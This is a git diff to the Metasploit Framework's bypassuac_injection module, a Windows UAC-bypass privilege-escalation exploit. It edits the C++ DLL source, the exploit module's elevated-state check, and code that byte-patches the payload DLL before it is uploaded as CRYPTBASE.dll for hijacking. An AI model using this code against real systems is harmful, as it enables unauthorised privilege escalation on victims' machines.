diff --git a/data/post/bypassuac-x64.dll b/data/post/bypassuac-x64.dll index f5135759d5..3bfc37552b 100644 Binary files a/data/post/bypassuac-x64.dll and b/data/post/bypassuac-x64.dll differ diff --git a/data/post/bypassuac-x86.dll b/data/post/bypassuac-x86.dll index d9a88d462f..8ea8f0ad21 100644 Binary files a/data/post/bypassuac-x86.dll and b/data/post/bypassuac-x86.dll differ diff --git a/external/source/exploits/bypassuac_injection/dll/src/Exploit.cpp b/external/source/exploits/bypassuac_injection/dll/src/Exploit.cpp index fd4e34abae..16e57f0c3f 100644 --- a/external/source/exploits/bypassuac_injection/dll/src/Exploit.cpp +++ b/external/source/exploits/bypassuac_injection/dll/src/Exploit.cpp @@ -85,8 +85,6 @@ void exploit() Wow64DisableWow64FsRedirection(&OldValue); if (ShellExecuteExW(&shinfo) && shinfo.hProcess != NULL) { - WaitForSingleObject(shinfo.hProcess, 200); - TerminateProcess(shinfo.hProcess, 0); // Even better if the template payload.dll calls ExitProcess CloseHandle(shinfo.hProcess); } Wow64RevertWow64FsRedirection(OldValue); diff --git a/modules/exploits/windows/local/bypassuac_injection.rb b/modules/exploits/windows/local/bypassuac_injection.rb index 4ebf4927ac..1e5c21924e 100644 --- a/modules/exploits/windows/local/bypassuac_injection.rb +++ b/modules/exploits/windows/local/bypassuac_injection.rb @@ -1,8 +1,6 @@ ## -# This file is part of the Metasploit Framework and may be subject to -# redistribution and commercial restrictions. Please see the Metasploit -# Framework web site for more information on licensing and terms of use. -# http://metasploit.com/framework/ +# This module requires Metasploit: http//metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' @@ -64,7 +62,7 @@ class Metasploit3 < Msf::Exploit::Local def exploit - fail_with(Exploit::Failure::None, 'Already in elevated state') if is_admin? or is_system? + #fail_with(Exploit::Failure::None, 'Already in elevated state') if is_admin? or is_system? # # Verify use against Vista+ @@ -154,6 +152,11 @@ class Metasploit3 < Msf::Exploit::Local # Generate payload and random names for upload # payload = generate_payload_dll + # Change ExitThread to ExitProcess ... + exit_thread = "\x45\x78\x69\x74\x54\x68\x72\x65\x61\x64\x00" + exit_process = "\x45\x78\x69\x74\x50\x72\x6F\x63\x65\x73\x73" + index = payload.index(exit_thread) + payload[index,exit_process.length] = exit_process payload_filepath = "#{tmpdir}\\CRYPTBASE.dll" print_status("Uploading the Payload DLL to the filesystem...")